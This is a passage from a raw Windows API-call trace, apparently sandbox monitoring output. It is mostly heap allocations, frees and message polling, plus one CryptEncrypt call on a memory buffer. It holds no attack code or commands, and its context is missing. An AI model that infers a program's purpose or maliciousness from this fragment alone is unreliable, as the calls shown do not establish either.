lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0231.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0231.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a38) returned 0x2f17258 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0231.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0231.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0231.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0231.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0231.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0231.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0231.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0231.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0231.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0231.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0231.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0231.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0231.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0231.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0231.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0231.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0231.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0231.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0231.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a33) returned 0x2f19c98 [0231.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a33) returned 0x2f1c6d8 [0231.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0231.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0231.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0231.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0231.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0231.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f19c98 | out: hHeap=0x970000) returned 1 [0231.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0231.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0231.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1c6d8 | out: hHeap=0x970000) returned 1 [0231.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0231.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0231.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0231.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0231.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0231.795] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0231.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0231.796] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0231.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0231.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0231.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0231.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0231.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0231.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0231.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0231.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0231.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0231.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0231.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0231.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0231.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0231.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0231.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0231.798] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0231.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51478, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0231.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0231.798] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0231.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0231.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.798] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f17258*, pdwDataLen=0x8cef60*=0x2a33, dwBufLen=0x2a38 | out: pbData=0x2f17258*, pdwDataLen=0x8cef60*=0x2a38) returned 1 [0231.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0231.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.799] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0231.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0231.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0231.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0231.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0231.800] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0231.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.800] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0231.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0231.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0231.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0231.800] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0231.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0231.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0231.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0231.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0231.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0231.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0231.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0231.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0231.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0231.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0231.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0231.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0231.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0231.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0231.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0231.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0231.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0231.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0231.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0231.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0231.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0231.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0231.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0231.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0231.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0231.802] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0231.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0231.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0231.802] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0231.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0231.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0231.802] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0231.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0231.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0231.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0231.802] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0231.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0231.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0231.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0231.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0231.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0231.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0231.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0231.803] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0231.803] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0231.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0231.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0231.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0231.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0231.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0231.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0231.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a38) returned 0x2f19c98 [0231.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0231.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0231.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a38) returned 0x2f1f118 [0231.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0231.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0231.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f19c98 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 